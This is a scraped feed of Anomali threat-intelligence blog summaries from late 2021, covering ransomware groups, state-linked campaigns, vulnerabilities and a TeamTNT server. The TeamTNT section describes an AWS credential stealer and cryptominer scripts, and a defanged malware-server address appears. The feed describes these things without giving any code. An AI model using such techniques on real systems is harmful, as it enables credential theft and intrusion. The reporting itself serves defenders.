[MITRE ATT&CK] Data Staged - T1074 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hooking - T1179 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Pass the Hash - T1075 Tags: Threat Group 3390, APT27, TG-3390, Emissary Panda, WildFire, NGLite backdoor, Cobalt Strike, Godzilla, PwDump, beacon, ChinaChopper, CVE-2021-40539, Healthcare, Military, North America, China REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom (published: November 9, 2021) A 22 year old Ukranian national named Yaroslav Vasinskyi, has been charged with conducting ransomware attacks by the U.S Department of Justice (DOJ). These attacks include t]]> 2021-11-16T17:34:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-revil-affiliates-arrested-electronics-retail-giant-hit-by-ransomware-robinhood-breach-zero-day-in-palo-alto-security-appliance-and-more www.secnews.physaphae.fr/article.php?IdArticle=3667130 False Ransomware,Data Breach,Malware,Tool,Vulnerability,Threat,Medical APT 38,APT 27,APT 1 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released (published: November 5, 2021) A proof-of-concept (PoC) tool to test for the recently revealed BrakTooth flaws in Bluetooth devices, and the researchers who discovered them have released both the test kit and full exploit code for the bugs. On Thursday, CISA urged manufacturers, vendors and developers to patch or employ workarounds. On Monday, the University of Singapore researchers updated their table of affected devices, after the chipset vendors Airoha, Mediatek and Samsung reported that some of their devices are vulnerable. Analyst Comment: Users are urged to patch or employ workarounds as soon as possible. Tags: Bluetooth, BrakTooth, Exploit, Vulnerability CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution (published: November 4, 2021) Researchers at SentinelOne have identified a vulnerability in the TIPC Module, part of the Linux Kernel. The Transparent Inter-Process Communication (TIPC) module is a protocol that is used for cluster-wide operation and is packaged as part of most major Linux distributions. The vulnerability, designated as “CVE-2021-43267”, is a heap overflow vulnerability that could be exploited to execute code within the kernel. Analyst Comment: TIPC users should ensure their Linux kernel version is not between 5.10-rc1 and 5.15. Tags: Linux, TIPC, Vulnerabiltity Ukraine Links Members Of Gamaredon Hacker Group To Russian FSB (published: November 4, 2021) The Ukrainian Secret Service claims to have identified five members of the threat group, Gamaredon. The group, who Ukraine are claiming to be operated by the Russian Federal Security Service (FSB), are believed to be behind over 5,000 attacks against Ukraine. These attacks usually consist of malicious documents and using a template injection vulnerability, the group has targeted government, public and private entities. Analyst Comment: Users should be careful that a file is sent via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. Users should be careful when viewing documents that ask for macros to be enabled. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 Tags: Gamaredon, Malicious Documents, Russia, Ukraine, Template Injection ]]> 2021-11-10T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-gitlab-vulnerability-exploited-in-the-wild-mekotio-banking-trojan-returns-microsoft-exchange-vulnerabilities-exploited-again-and-more www.secnews.physaphae.fr/article.php?IdArticle=3639043 False Ransomware,Data Breach,Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild. Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so]]> 2021-11-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more www.secnews.physaphae.fr/article.php?IdArticle=3598623 False Ransomware,Malware,Tool,Threat,Guideline APT 29,APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Harvester: Nation-State-Backed Group Uses New Toolset To Target Victims In South Asia (published: October 18, 2021) A new threat group dubbed ‘Harvester’ has been found attacking organizations in South Asia and Afghanistan using a custom toolset composed of both public and private malware. Given the nature of the targets, which include governments, IT and Telecom companies, combined with the information stealing campaign, there is a high likelihood that this group is Nation-State backed. The initial infection method is unknown, but victim machines are directed to a URL that checks for a local file (winser.dll). If it doesn’t exist, a redirect is performed for a VBS file to download and run; this downloads and installs the Graphon backdoor. The command and control (C2) uses legitimate Microsoft and CloudFront services to mask data exfiltration. Analyst Comment: Nation-state threat actors are continually evolving their tactics, techniques and tools to adapt and infiltrate victim governments and/or companies. Ensure that employees have a training policy that reflects education on only downloading programs or documents from known, trusted sources. It is also important to notify management and the proper IT department if you suspect malicous activity may be occurring. MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Process Discovery - T1057 Tags: Backdoor.Graphon, Cobalt Strike Beacon, Metasploit Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes (published: October 14, 2021) Unit 42 researchers have observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers - but also by attackers - to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof-of-concept (PoC) for an exploit can insert "Interactsh" to check whether the exploit is working, but the service could also be used to check if the PoC is working. The tool became publicly available on April 16, 2021, and the first attempts to abuse it were observed soon after, on April 18, 2021. Analyst Comment: As the landscape changes, researchers and attackers will often use the same tools in order to reach a goal. In this instance, Interact.sh can be used to show if an exploit will work. Dual-use tools are often under fire for being able to validate malicious code, with this being the latest example. If necessary, take precautions and block traffic with interact.sh attached to it within company networks. Tags: Interactsh, Exploits ]]> 2021-10-19T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-fin12-ramps-up-in-europe-interactsh-being-used-for-malicious-purposes-new-yanluowang-ransomware-and-more www.secnews.physaphae.fr/article.php?IdArticle=3531690 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Patching,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report (published: October 7, 2021) Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%). Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions. MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110 Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran Ransomware in the CIS (published: October 7, 2021) Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto]]> 2021-10-12T17:41:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-aerospace-and-telecoms-targeted-by-iranian-malkamak-group-cozy-bear-refocuses-on-cyberespionage-wicked-panda-is-traced-by-malleable-c2-profiles-and-more www.secnews.physaphae.fr/article.php?IdArticle=3505382 False Ransomware,Malware,Tool,Threat,Guideline,Prediction APT 29,APT 29,APT 39,APT 28,APT 41,APT 41 None Anomali - Firm Blog Figure 1 - Overview of /cmd/ Contained on the server are approximately 50 scripts, most of which are already documented, located in the /cmd/ directory. The objective of the scripts vary and include the following: AWS Credential Stealer Diamorphine Rootkit IP Scanners Mountsploit Scripts to set up utils Scripts to setup miners Scripts to remove previous miners Figure 2 - Snippet of AWS Credential Stealer Script Some notable scripts, for example, is the script that steals AWS EC2 credentials, shown above in Figure 2. The AWS access key, secret key, and token are piped into a text file that is uploaded to the Command and Control (C2) server. Figure 3 - Chimaera_Kubernetes_root_PayLoad_2.sh Another interesting script is shown in Figure 3 above, which checks the architecture of the system, and retrieves the XMRig miner version for that architecture from another open TeamTNT server, 85.214.149[.]236. Binaries (/bin/) Figure 4 - Overview of /bin Within the /bin/ folder, shown in Figure 4 above, there is a collection of malicious binaries and utilities that TeamTNT use in their operations. Among the files are well-known samples that are attributed to TeamTNT, including the Tsunami backdoor and a XMRig cryptominer. Some of the tools have the source code located on the server, such as TeamTNT Bot. The folder /a.t.b contains the source code for the TeamTNT bot, shown in Figures 5 and 6 below. In addition, the same binaries have been found on a TeamTNT Docker, noted in Appendix A. ]]> 2021-10-06T19:06:00+00:00 https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server www.secnews.physaphae.fr/article.php?IdArticle=3479896 False Malware,Tool,Threat APT 32,Uber None Anomali - Firm Blog Threat intelligence platforms (TIP) are critical security tools that use global intelligence data to help proactively identify, mitigate and remediate security risks. A TIP pulls together key cyber threat defense functions, creating a holistic threat intelligence system. Some of the key benefits are operationalizing data gathering, processing data into intelligence, integrating information from various sources, streamlining the intelligence cycle, and better navigate the threat landscape. While this tool has obvious advantages to security professionals, making the business case to invest in a TIP can be a challenge. Making the Business Case for a TIP Speaking in a Language Management Understands The case needs to be made from management's perspective to justify the investment in a TIP. Start with mapping security objectives with management objectives, understanding the business risks that concern them vs. cyber threats in general, and quantifying the return on investment. Interviewing the heads of key intelligence stakeholders throughout the organization is a good way of gaining the insight needed to understand the business and how it is affected by cybersecurity. This communication can also create the trust that the security teams are working for them and their goals.  Communication style is also essential. Security terms that are part of the everyday vocabulary of SOC analysts and threat intelligence teams may not be readily understandable by those in other functional areas. More technical language should be translated into basic concepts, and information should be contextualized to resonate with the audience. Visual mapping and use cases can be persuasive communication techniques. Visual mapping of the relationships between intelligence stakeholders can describe solutions in a way that transcends security terminology. Use cases from your own company or others in similar industries is an effective way of giving real-world context to a TIP implementation. Threat Intelligence Platform Return on Investment The bottom line for any investment is the quantifiable return it will have for the company. Cost savings are the most obvious contribution that threat intelligence tools can make to an organization. However, revenue generation can also be a significant payback of operationalized threat intelligence. Regulatory compliance can also contribute to a positive ROI. TIP Cost Reductions The cost of a devastating data breach is always top of mind for a company. Investing in a TIP that minimizes financial risk can be justified by focusing on relevant threats. Depending on the industry, the pure financial losses can be enormous. Breaches like those at Home Depot and Target have run into tens of millions of dollars. Potential direct operational fees for legal and forensic services, consultants, and customer care are most easily quantified. Harder to quantify but potentially just as costly are loss of brand equity and reputational damage. Better utilization of assets is also a significant contribution to cost reductions. Automation of data gathering, processing, and intelligence reporting saves threat intelligence analysts' time, freeing them for more strategic threat hunting, etc. A TIP can also eliminate the need for additional headcount and reduce time spent on chasing false positives. By replacing unnecessary security tools with a TIP that functions more effectively, you can further reduce costs. TIP Revenue Generation While cost reductions are a more typical contributor to calcu]]> 2021-10-06T14:30:00+00:00 https://www.anomali.com/blog/making-the-case-for-a-threat-intelligence-platform www.secnews.physaphae.fr/article.php?IdArticle=3477601 False Data Breach,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Google Just Patched These Two Chrome Zero-day Bugs That Are Under Attack Right Now (published: October 1, 2021) Google has warned users of Google Chrome to update to version 94.0.4606.71, due to two new zero-days that are currently being exploited in the wild. This marks the second update in a month due to actively exploited zero-day flaws. The first of these common vulnerabilities and exposures (CVEs), CVE-2021-37975, is a high severity flaw in the V8 JavaScript engine, which has been notoriously difficult to protect and could allow attackers to create malware that is resistant to hardware mitigations. Analyst Comment: Users and organizations are recommended to regularly check for and apply updates to the software applications they use, especially web browsers that are increasingly used for a variety of tasks. Organizations can leverage the capabilities of Anomali Threatstream to rapidly get information about new CVEs that need to be mitigated through their vulnerability management program. Tags: CVE-2021-37975, CVE-2021-37976, chrome, zero-day Hydra Malware Targets Customers of Germany's Second Largest Bank (published: October 1, 2021) A new campaign leveraging the Hydra banking trojan has been discovered by researchers. The malware containing an Android application impersonates the legitimate application for Germany's largest bank, Commerzbank. While Hydra has been seen for a number of years, this new campaign incorporates many new features, including abuse of the android accessibility features and permissions which give the application the ability to stay running and hidden with basically full administrator privileges over a victim's phone. It appears to be initially spread via a website that imitates the official Commerzbank website. Once installed it can spread via bulk SMS messages to a user's contacts. Analyst Comment: Applications, particularly banking applications, should only be installed from trusted and verified sources and reviewed for suspicious permissions they request. Similarly, emails and websites should be verified before using. Tags: Banking and Finance, EU, Hydra, trojan New APT ChamelGang Targets Russian Energy, Aviation Orgs (published: October 1, 2021) A new Advanced Persistent Threat (APT) group dubbed “ChamelGang” has been identified to be targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server’s ProxyShell and leveraging both new and existing malware to compromise networks. Researchers at Positive Technologies have been tracking the group since March 2017, and have observed that they have attacked targets in 10 countries so far. The group has been able to hi]]> 2021-10-05T18:28:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-new-apt-chamelgang-foggyweb-vmware-vulnerability-exploited-and-more www.secnews.physaphae.fr/article.php?IdArticle=3472727 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Solardwinds,Solardwinds,APT 27 None